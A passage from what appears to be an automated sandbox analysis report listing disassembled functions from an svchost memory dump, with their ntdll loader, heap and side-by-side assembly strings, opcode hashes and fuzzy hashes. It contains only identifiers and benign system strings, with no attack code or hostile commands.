                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                                                      • API String ID: 0-664215390
                                                                                                                      • Opcode ID: 3a12f0ab0326da6df5d88a608e24593ad43aa9db13092a2cd4a187b7c0fd7cb3
                                                                                                                      • Instruction ID: 36a0f23afe4e88e562e492531d4013ec15e96887dd6ac9adbd513abff5538538
                                                                                                                      • Opcode Fuzzy Hash: 3a12f0ab0326da6df5d88a608e24593ad43aa9db13092a2cd4a187b7c0fd7cb3
                                                                                                                      • Instruction Fuzzy Hash: 8C324B75E04269CBEF21CA14CCD4BEEF7B9AF46350F1881EAE849A7250D7759E818F40
                                                                                                                      Function 03349EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Internal error check failed, xrefs: 03397718, 033978A9
                                                                                                                      • @, xrefs: 03349EE7
                                                                                                                      • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03397709
                                                                                                                      • sxsisol_SearchActCtxForDllName, xrefs: 033976DD
                                                                                                                      • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 033976EE
                                                                                                                      • Status != STATUS_NOT_FOUND, xrefs: 0339789A
                                                                                                                      • minkernel\ntdll\sxsisol.cpp, xrefs: 03397713, 033978A4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                      • API String ID: 0-761764676
                                                                                                                      • Opcode ID: aaa0667b41cd1650c0fea1c22debccb92481044ee4f5643c389ef6a283abb951
                                                                                                                      • Instruction ID: d2814612de36ba4cd2328d2a1a2ec243189b6da518ddbb8f69215af19b4d36d3
                                                                                                                      • Opcode Fuzzy Hash: aaa0667b41cd1650c0fea1c22debccb92481044ee4f5643c389ef6a283abb951
                                                                                                                      • Instruction Fuzzy Hash: 23126C75D00215DBDB24CF98C8C1BAEB7F8EF48714F1885AAE845EB241E734A841CB65
                                                                                                                      Function 0333EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      • API String ID: 0-1109411897
                                                                                                                      • Opcode ID: 5a2d150e543db9a184895c822db4cd158b6b06a107c7380cb0a73d2ff196c5c3
                                                                                                                      • Instruction ID: d9c2c31b4f3af7a9a8085549d93307e111c6f98be6ef83ca4e64a6ca564a4ab8
                                                                                                                      • Opcode Fuzzy Hash: 5a2d150e543db9a184895c822db4cd158b6b06a107c7380cb0a73d2ff196c5c3
                                                                                                                      • Instruction Fuzzy Hash: 2DA21675E0562ACBEF64DF19CDD87A9B7B5AF49304F1482EAD809A7250DB349E81CF00
                                                                                                                      Function 0332F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-523794902
                                                                                                                      • Opcode ID: 5a4e18ec6efc9a9b0fe81e597c3ae3a89d25f193006772a313904dfde0acf0a9
                                                                                                                      • Instruction ID: 8140f3180ed44d8b2a93fac26642b018bb3818ff52b27ae105d1a23c99e32d51
                                                                                                                      • Opcode Fuzzy Hash: 5a4e18ec6efc9a9b0fe81e597c3ae3a89d25f193006772a313904dfde0acf0a9
                                                                                                                      • Instruction Fuzzy Hash: 1D42FE796083919FC715EF28C8C0A2AFBF9FF89604F184A6DE4958B791D734E841CB52
                                                                                                                      Function 0334B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-122214566
                                                                                                                      • Opcode ID: 734104a7135fb1affc09eac01a14ac7b69ab2376b70da169936138ce3341c8b2
                                                                                                                      • Instruction ID: be8ab1611911fb155f6ba3c6b39211367ca1ffb62c5f46621e9e4ea1005e3612
                                                                                                                      • Opcode Fuzzy Hash: 734104a7135fb1affc09eac01a14ac7b69ab2376b70da169936138ce3341c8b2
                                                                                                                      • Instruction Fuzzy Hash: 1EC1F535E00215EBDB24DB65CCD1BBEF7E9AF46300F184069E8859F681E7B4E984C391
                                                                                                                      Function 033663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-792281065
                                                                                                                      • Opcode ID: 4c6ead365303c42619a094d8db863f2d68cebe9a572ebeecbd0f9cdbaaec3e28
                                                                                                                      • Instruction ID: f84aff93644551f4873fb3f613bea7b91899bc8200f03d2a15fbf0c378ae2f88
                                                                                                                      • Opcode Fuzzy Hash: 4c6ead365303c42619a094d8db863f2d68cebe9a572ebeecbd0f9cdbaaec3e28
                                                                                                                      • Instruction Fuzzy Hash: 9B914234E00B149FDB25EF19DCC6BAAB7A4EF41B64F488168E910BF685D7A49840CB90
                                                                                                                      Function 03362674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 033A219F
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 033A2178
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 033A2180
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 033A2165
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 033A21BF
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 033A2160, 033A219A, 033A21BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      • Opcode ID: 40a3c4fadb321824fb5cc6522e340c4ae09a9b2d3f2be543391d6f6835fe4238
                                                                                                                      • Instruction ID: 6a05cf1140399945b55535f66d87e24e6f5d14f7863f36312bf85841ed6cdf82
                                                                                                                      • Opcode Fuzzy Hash: 40a3c4fadb321824fb5cc6522e340c4ae09a9b2d3f2be543391d6f6835fe4238
                                                                                                                      • Instruction Fuzzy Hash: 8B31263AF41214BFE725CA998CC1F5FB778DB95A40F0A8469FA14EB246D270DA00C7E1
                                                                                                                      Function 0336C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 033A81E5
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 033A8181, 033A81F5
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0336C6C3
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 033A8177, 033A81EB
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 033A8170
                                                                                                                      • LdrpInitializeProcess, xrefs: 0336C6C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      • Opcode ID: 44857e104cada00a386b6cc909dc996c6e3150b5c93c5a0ea9b6eeafe1fc309d
                                                                                                                      • Instruction ID: 1896c530615a3b4be18e3050bb0f7ed3ad4ce23ff9e2b08429cb2231b0f27a2a
                                                                                                                      • Opcode Fuzzy Hash: 44857e104cada00a386b6cc909dc996c6e3150b5c93c5a0ea9b6eeafe1fc309d
                                                                                                                      • Instruction Fuzzy Hash: C931D575A447459FC224EF28DDC5E2AB7E4EF84B10F044958F885AF295E624EC04C7A2
                                                                                                                      Function 033B9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                      • API String ID: 0-3127649145
                                                                                                                      • Opcode ID: bae8ece4a72ee7c191d5b91a11e48f759b1771afd8e753ac999d1efc0cba4a98
                                                                                                                      • Instruction ID: b5b17576283b3a9779c309e53033899d2229201e3caa746611a7c85118cbaf30
                                                                                                                      • Opcode Fuzzy Hash: bae8ece4a72ee7c191d5b91a11e48f759b1771afd8e753ac999d1efc0cba4a98
                                                                                                                      • Instruction Fuzzy Hash: 4A322775A017199BDB71DF25CC88BDAB7F8EF48300F1045EAE609AB650DB74AA84CF50
                                                                                                                      Function 03349950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                      • API String ID: 0-3393094623
                                                                                                                      • Opcode ID: ddf9d91fd75dc456b1e646346749a3e65558d5d1ec465808f89fba4a55023634
                                                                                                                      • Instruction ID: 934b53f5eb1fce77b28c6f89a7cde593936de38e64ecb88ed15a0782e44d7e7a
                                                                                                                      • Opcode Fuzzy Hash: ddf9d91fd75dc456b1e646346749a3e65558d5d1ec465808f89fba4a55023634
                                                                                                                      • Instruction Fuzzy Hash: 36024875918341CFD720CF64C4C4B6BF7E9AF89704F48895EE9998B250E770E884CB92
                                                                                                                      Function 033551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 03355352
                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0335542B
                                                                                                                      • WindowsExcludedProcs, xrefs: 0335522A
                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 03355247
                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0335527B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                      • API String ID: 0-258546922
                                                                                                                      • Opcode ID: 4e7f0ec79bcfb25f2d55b26b1a1a9ed0521e48581cb492d81c317d503afde26e
                                                                                                                      • Instruction ID: a9a320b6715465fbec9e14e2e1ed7c5f937ccec5a467c298b49600b02309732e
                                                                                                                      • Opcode Fuzzy Hash: 4e7f0ec79bcfb25f2d55b26b1a1a9ed0521e48581cb492d81c317d503afde26e
                                                                                                                      • Instruction Fuzzy Hash: BBF13A76D10218EBDF15DF98C9C0EAEBBFDEF49650F15406AE902AB250D774AE018B90
                                                                                                                      Function 033B4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                      • API String ID: 0-2518169356
                                                                                                                      • Opcode ID: a353c909c329f854eebf6c56d5221ba43eae186fa1049c319b2fd2d7dca5ee19
                                                                                                                      • Instruction ID: 602c0425ee8afd98877022945c6c853dd28d436d453a14056f6f730febbd0f4c
                                                                                                                      • Opcode Fuzzy Hash: a353c909c329f854eebf6c56d5221ba43eae186fa1049c319b2fd2d7dca5ee19
                                                                                                                      • Instruction Fuzzy Hash: 8691CE76D006199BDB20CFA9C8C1AFEB7B4EF8A310F594169E910EB750D739DA01CB90
                                                                                                                      Function 0335D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1975516107
                                                                                                                      • Opcode ID: 66fe7e594493835702bdaaec332da42b7dacfd2bcc5b06ec0dcbdbfce87a138d
                                                                                                                      • Instruction ID: 72a6adbdc363ab75ed5af851e14e293c417548960cc4297c27fb5b50e5c97579
                                                                                                                      • Opcode Fuzzy Hash: 66fe7e594493835702bdaaec332da42b7dacfd2bcc5b06ec0dcbdbfce87a138d
                                                                                                                      • Instruction Fuzzy Hash: B951A975E003459FDB24EFA4C8C4BADBBF1BB49314F688199E811BF695D774A881CB80
                                                                                                                      Function 033276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                      • API String ID: 0-3061284088
                                                                                                                      • Opcode ID: 076b2da465b276707b0c658c46e6b5df40391287a2c58a44fb792da6c0e6c25c
                                                                                                                      • Instruction ID: f626839426d560414c148dc5f5fda196ee2c18b5c974db8bea2f7279283b43c2
                                                                                                                      • Opcode Fuzzy Hash: 076b2da465b276707b0c658c46e6b5df40391287a2c58a44fb792da6c0e6c25c
                                                                                                                      • Instruction Fuzzy Hash: D6012876508360DFD225F32998D9F66FBD8DB42A70F184049F0204BA92CBA89880C520
                                                                                                                      Function 033470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: 481a46e13970bb91eb74ded8eb4ffc84d3518fe7486bab10a56aa2ecc235da93
                                                                                                                      • Instruction ID: fd41f9c876be8ae573c2cb0c3a52ef68c9aed713b8ffa5883099086a1637ca81
                                                                                                                      • Opcode Fuzzy Hash: 481a46e13970bb91eb74ded8eb4ffc84d3518fe7486bab10a56aa2ecc235da93
                                                                                                                      • Instruction Fuzzy Hash: A2139974A006558FDB24CF68C8D0BA9FBF5BF49304F1881A9D859AF381D735B986CB90
                                                                                                                      Function 03341070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3570731704
                                                                                                                      • Opcode ID: 5295f072a2b1198d7069be192f0018952b725f7bac930fecb3cf0d7c9b661b58
                                                                                                                      • Instruction ID: f55f88299f41c3eca37dab1945f35f5938d3d6db212d8ded6a8742c8421ac444
                                                                                                                      • Opcode Fuzzy Hash: 5295f072a2b1198d7069be192f0018952b725f7bac930fecb3cf0d7c9b661b58
                                                                                                                      • Instruction Fuzzy Hash: D7922875E01629CFEB25CF18CC80BA9B7B9AF45314F0981EAD949AB250D774AEC0CF51
                                                                                                                      Function 0334A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03397D03
                                                                                                                      • SsHd, xrefs: 0334A885
                                                                                                                      • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03397D56
                                                                                                                      • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03397D39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                      • API String ID: 0-2905229100
                                                                                                                      • Opcode ID: b5364b3c46696d8a75bed75190db1ca88ae4d317189afad0eab35125587e441e
                                                                                                                      • Instruction ID: 814e4c0750f8014493d14ed5415ce5858d061ea67f0aefb5993de87b56778169
                                                                                                                      • Opcode Fuzzy Hash: b5364b3c46696d8a75bed75190db1ca88ae4d317189afad0eab35125587e441e
                                                                                                                      • Instruction Fuzzy Hash: A4D15875A40219DBDF24CFA8C8C0AADF7F5FF48310F19406AE845AB251E371E991CBA0
                                                                                                                      Function 03343D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      • API String ID: 0-3178619729
                                                                                                                      • Opcode ID: fa135affce107be2311036a3a9244caac5c4081978a914278eb4a4bcce2c661b
                                                                                                                      • Instruction ID: 7c460e1a71833bbc887186b8494199deb1ac385f0f4f28d4a12c6c3ef7615997
                                                                                                                      • Opcode Fuzzy Hash: fa135affce107be2311036a3a9244caac5c4081978a914278eb4a4bcce2c661b
                                                                                                                      • Instruction Fuzzy Hash: B6E2AD74A002159FDB24CF69C8D0BA9FBF5FF49304F1881A9E849AB795D734B885CB90
                                                                                                                      Function 0333A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      • Opcode ID: 954f093e9d158550cb4cceb406e9c4c884611e926418897061eb6cd897e51d60
                                                                                                                      • Instruction ID: 3676b2be938c1f83ce727b4e9ad0d09fe263e2544ed2465361e6a5f249ea133a
                                                                                                                      • Opcode Fuzzy Hash: 954f093e9d158550cb4cceb406e9c4c884611e926418897061eb6cd897e51d60
                                                                                                                      • Instruction Fuzzy Hash: B4C17774508386DFEB11CF18C484B6AB7E8AF86704F04896AF8D5CB650E735D989CB52
                                                                                                                      Function 03340C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 033954E0, 033955A1
                                                                                                                      • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 033954ED
                                                                                                                      • HEAP[%wZ]: , xrefs: 033954D1, 03395592
                                                                                                                      • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 033955AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                      • API String ID: 0-1657114761
                                                                                                                      • Opcode ID: 6aba50bdc0b38c8c27ae042e04f1e49201f0fdef77f93b2aceb065752a4e5257
                                                                                                                      • Instruction ID: 250c7f9090528ad67bd4d361dd2025eb1d9accc8ae2aedbe884a00ca52fbcad1
                                                                                                                      • Opcode Fuzzy Hash: 6aba50bdc0b38c8c27ae042e04f1e49201f0fdef77f93b2aceb065752a4e5257
                                                                                                                      • Instruction Fuzzy Hash: 06A1D174B04645DFEB28DF28C8C0B7AFBE5AF46300F188569D5968B692D734B884CB91
                                                                                                                      Function 0336273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 033A22B6
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 033A21DE
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 033A21D9, 033A22B1
                                                                                                                      • .Local, xrefs: 033628D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      • Opcode ID: c04933a165c7888c0d463125e651e3f2eaec46c0f8bdb4e48451a6b4cd32bcbf
                                                                                                                      • Instruction ID: 8d66bddb2f71a1c9a343d421bac1315b96780bbae0936a78781e134b7397bb1d
                                                                                                                      • Opcode Fuzzy Hash: c04933a165c7888c0d463125e651e3f2eaec46c0f8bdb4e48451a6b4cd32bcbf
                                                                                                                      • Instruction Fuzzy Hash: 4DA18D359012299FDB24CF68CCC4BAAB3B5BF58314F1989E9D848EB655D7309E90CF90
                                                                                                                      Function 0332F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
